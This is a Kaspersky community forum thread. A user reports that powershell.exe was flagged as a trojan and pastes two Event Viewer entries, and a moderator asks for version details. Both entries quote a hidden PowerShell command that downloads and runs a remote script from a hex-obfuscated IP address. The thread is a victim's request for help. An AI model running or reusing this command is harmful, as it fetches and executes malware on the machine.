MPR Posted February 21 Posted February 21 Hi. So, Kaspersky has detected powershell.exe as a malicious object. It says the object was uid:/amsi_stream_4, a trojan. I've checked Event Viewer and i have two warnings at the time i got a PowerShell window popping up on my screen with the source being "avp" and the info/details i have are: Number: "45399392" Name: "32d87a95" Confidence: "00000000" ProcessSha256: "9785001B0DCF755EDDB8AF294A373C0B87B2498660F724E76C4D53F9C217C7A3" ProcessPath: "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ProcessCommandLine: ""powershell.exe" -nop -exec bypass -w hidden -command "iex(irm 0xc0.0x6d.0xc8.0x3f/event)"" Bases: "2026.02.21 19:23:00:000" And: Number: "45399392" Name: "aa81fd45" Confidence: "00000006" ProcessSha256: "9785001B0DCF755EDDB8AF294A373C0B87B2498660F724E76C4D53F9C217C7A3" ProcessPath: "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ProcessCommandLine: ""powershell.exe" -nop -exec bypass -w hidden -command "iex(irm 0xc0.0x6d.0xc8.0x3f/event)"" Bases: "2026.02.21 19:23:00:000" Could someone please help me understand what am i dealing with here? Thanks in advance.
harlan4096 Posted February 22 Posted February 22 Welcome to Kaspersky Community. Please provide the version of K. and operating system. Can You attach, from Your Kaspersky Reports, captures of the details of those detections?
Recommended Posts
Please sign in to comment
You will be able to leave a comment after signing in
Sign In Now